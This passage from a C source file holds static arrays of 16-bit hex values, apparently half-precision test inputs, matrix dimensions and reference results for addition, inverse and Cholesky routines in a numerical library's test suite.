0x36ee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3800, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3879, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38e6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x394b, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39a8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a53, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3aa2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3aee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b36, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3bbf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x3aee, 0x0, 0x349e, 0x3a88 }; static const uint16_t in_dims[98] = { 0x0001, 0x0001, 0x0001, 0x0002, 0x0001, 0x0003, 0x0001, 0x0004, 0x0001, 0x0007, 0x0001, 0x0010, 0x0001, 0x0017, 0x0002, 0x0001, 0x0002, 0x0002, 0x0002, 0x0003, 0x0002, 0x0004, 0x0002, 0x0007, 0x0002, 0x0010, 0x0002, 0x0017, 0x0003, 0x0001, 0x0003, 0x0002, 0x0003, 0x0003, 0x0003, 0x0004, 0x0003, 0x0007, 0x0003, 0x0010, 0x0003, 0x0017, 0x0004, 0x0001, 0x0004, 0x0002, 0x0004, 0x0003, 0x0004, 0x0004, 0x0004, 0x0007, 0x0004, 0x0010, 0x0004, 0x0017, 0x0007, 0x0001, 0x0007, 0x0002, 0x0007, 0x0003, 0x0007, 0x0004, 0x0007, 0x0007, 0x0007, 0x0010, 0x0007, 0x0017, 0x0010, 0x0001, 0x0010, 0x0002, 0x0010, 0x0003, 0x0010, 0x0004, 0x0010, 0x0007, 0x0010, 0x0010, 0x0010, 0x0017, 0x0017, 0x0001, 0x0017, 0x0002, 0x0017, 0x0003, 0x0017, 0x0004, 0x0017, 0x0007, 0x0017, 0x0010, 0x0017, 0x0017 }; static const uint16_t in_inv_dims[10] = { 0x0001, 0x0002, 0x0003, 0x0004, 0x0007, 0x0008, 0x0009, 0x000F, 0x0010, 0x0002 }; static const uint16_t in_cholesky_dpo_dims[10] = { 0x0001, 0x0002, 0x0003, 0x0004, 0x0007, 0x0008, 0x0009, 0x000F, 0x0010, 0x0002 }; static const uint16_t ref_add[3136] = { 0xaa3e, 0xaa3e, 0x2a22, 0xaa3e, 0x2a22, 0xb413, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0xaa3e, 0x2a22, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0xaa3e, 0x2a22, 0xb413, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0x369a, 0xb1a8, 0xbb8d, 0x2c87, 0x3266, 0xb1af, 0x35a4, 0x386c, 0xb37c, 0xac06, 0x321a, 0xb7f5, 0xb0fc, 0x3852, 0xbbec, 0x3b0c, 0x36c3, 0xba1d, 0xb796, 0xb5c3, 0x3469, 0xacbd, 0xb687, 0xaf8c, 0xacaf, 0x2aba, 0xb570, 0x3141, 0x3941, 0xb28a, 0xb6f6, 0xb06d, 0x372e, 0xbab3, 0x30a1, 0xb6df, 0xb647, 0xaee4, 0xba8f, 0xa984, 0x33d7, 0xbb3a, 0x237d, 0x3910, 0xb0e2, 0x2ee4, 0x311a, 0x3462, 0x372a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0x369a, 0xb1a8, 0xbb8d, 0x2c87, 0x3266, 0xb1af, 0x35a4, 0x386c, 0xb37c, 0xac06, 0x321a, 0xb7f5, 0xb0fc, 0x3852, 0xbbec, 0x3b0c, 0x36c3, 0xba1d, 0xb796, 0xb5c3, 0x3469, 0xacbd, 0xb687, 0xaf8c, 0xacaf, 0x2aba, 0xb570, 0x3141, 0x3941, 0xb28a, 0xb6f6, 0xb06d, 0x372e, 0xbab3, 0x30a1, 0xb6df, 0xb647, 0xaee4, 0xba8f, 0xa984, 0x33d7, 0xbb3a, 0x237d, 0x3910, 0xb0e2, 0x2ee4, 0x311a, 0x3462, 0x372a, 0x381d, 0x32ba, 0x39b7, 0xb832, 0xb66b, 0xb45a, 0x359e, 0x331a, 0x35f7, 0xb852, 0xb5ac, 0xba73, 0xb6d1, 0x39ff, 0x30fa, 0xb41f, 0xb55b, 0x24c5, 0x303f, 0x3768, 0x3880, 0xba57, 0xb5d9, 0xb246, 0x33af, 0xa679, 0xb299, 0xba2d, 0x255b, 0x3a89, 0x2e03, 0x35bc, 0xb493, 0xb76e, 0x326a, 0x3419, 0x3482, 0x3198, 0xb624, 0x212a, 0xb0c8, 0xb1a4, 0x2349, 0x3a27, 0xb097, 0x359b, 0xa4bf, 0xb636, 0x39a0, 0x39a8, 0xb1f0, 0x39a2, 0x3c51, 0x398f, 0xb52b, 0x3927, 0x3a53, 0xb3c9, 0x374c, 0x2c2b, 0xb454, 0xb525, 0xb62c, 0x3484, 0x33c8, 0x3276, 0x2f95, 0x326f, 0xb9fc, 0xb78c, 0xaeea, 0xb376, 0xb48c, 0x33e5, 0xaed7, 0xa821, 0x2de2, 0xa135, 0x34ec, 0x3095, 0xad1a, 0xae11, 0x33ba, 0xb3a2, 0xb8c5, 0x389b, 0xb12e, 0xa96d, 0x3163, 0xb0fd, 0x3131, 0xb898, 0x31d1, 0x364b, 0x2fa8, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0x369a, 0xb1a8, 0xbb8d, 0x2c87, 0x3266, 0xb1af, 0x35a4, 0x386c, 0xb37c, 0xac06, 0x321a, 0xb7f5, 0xb0fc, 0x3852, 0xbbec, 0x3b0c, 0x36c3, 0xba1d, 0xb796, 0xb5c3, 0x3469, 0xacbd, 0xb687, 0xaf8c, 0xacaf, 0x2aba, 0xb570, 0x3141, 0x3941, 0xb28a, 0xb6f6, 0xb06d, 0x372e, 0xbab3, 0x30a1, 0xb6df, 0xb647, 0xaee4, 0xba8f, 0xa984, 0x33d7, 0xbb3a, 0x237d, 0x3910, 0xb0e2, 0x2ee4, 0x311a, 0x3462, 0x372a, 0x381d, 0x32ba, 0x39b7, 0xb832, 0xb66b, 0xb45a, 0x359e, 0x331a, 0x35f7, 0xb852, 0xb5ac, 0xba73, 0xb6d1, 0x39ff, 0x30fa, 0xb41f, 0xb55b, 0x24c5, 0x303f, 0x3768, 0x3880, 0xba57, 0xb5d9, 0xb246, 0x33af, 0xa679, 0xb299, 0xba2d, 0x255b, 0x3a89, 0x2e03, 0x35bc, 0xb493, 0xb76e, 0x326a, 0x3419, 0x3482, 0x3198, 0xb624, 0x212a, 0xb0c8, 0xb1a4, 0x2349, 0x3a27, 0xb097, 0x359b, 0xa4bf, 0xb636, 0x39a0, 0x39a8, 0xb1f0, 0x39a2, 0x3c51, 0x398f, 0xb52b, 0x3927, 0x3a53, 0xb3c9, 0x374c, 0x2c2b, 0xb454, 0xb525, 0xb62c, 0x3484, 0x33c8, 0x3276, 0x2f95, 0x326f, 0xb9fc, 0xb78c, 0xaeea, 0xb376, 0xb48c, 0x33e5, 0xaed7, 0xa821, 0x2de2, 0xa135, 0x34ec, 0x3095, 0xad1a, 0xae11, 0x33ba, 0xb3a2, 0xb8c5, 0x389b, 0xb12e, 0xa96d, 0x3163, 0xb0fd, 0x3131, 0xb898, 0x31d1, 0x364b, 0x2fa8, 0xa5f8, 0xb40d, 0xb26e, 0x350e, 0x2f53, 0x3a40, 0xae0a, 0x3624, 0x37da, 0xb79e, 0x37c0, 0x3149, 0xa9c9, 0x351d, 0x34e6, 0xb602, 0xb2e0, 0x3733, 0x3a5c, 0xb299, 0x34ce, 0xb29b, 0xb17b, 0xb37e, 0xb115, 0x3485, 0x3129, 0x3591, 0x317d, 0x349d, 0x34a8, 0x3844, 0xad3f, 0xb374, 0x3cb7, 0x3587, 0x361c, 0xbbc3, 0xb955, 0xb423, 0x31e2, 0x2da4, 0x3983, 0x2e92, 0xb58b, 0xaf2d, 0x29f9, 0xb6e9, 0x17db, 0x2e88, 0x3c64, 0x37ac, 0x3667, 0xb896, 0xb8a8, 0xa75a, 0x3056, 0x3ac5, 0xb896, 0xb9bd, 0xb977, 0xb6f7, 0x372b, 0x383c, 0xb3b0, 0x301a, 0xb699, 0x355b, 0xb540, 0x2cc8, 0xadb7, 0x37b6, 0x3992, 0x2f46, 0x29df, 0xb016, 0xb825, 0x35bc, 0x3647, 0xb6a0, 0x3c8d, 0xb4f5, 0x30c1, 0xb466, 0x35f3, 0x360b, 0xb319, 0x3344, 0x34bf, 0x3612, 0x388e, 0x2df7, 0xb961, 0xb001, 0xb72d, 0x3268, 0x3907, 0x37a1, 0xaa44, 0x3385, 0x35b2, 0x329e, 0x1ea1, 0x36ce, 0x35f0, 0x37d7, 0x3897, 0xb57b, 0x1f43, 0x3285, 0xacc4, 0x2fda, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 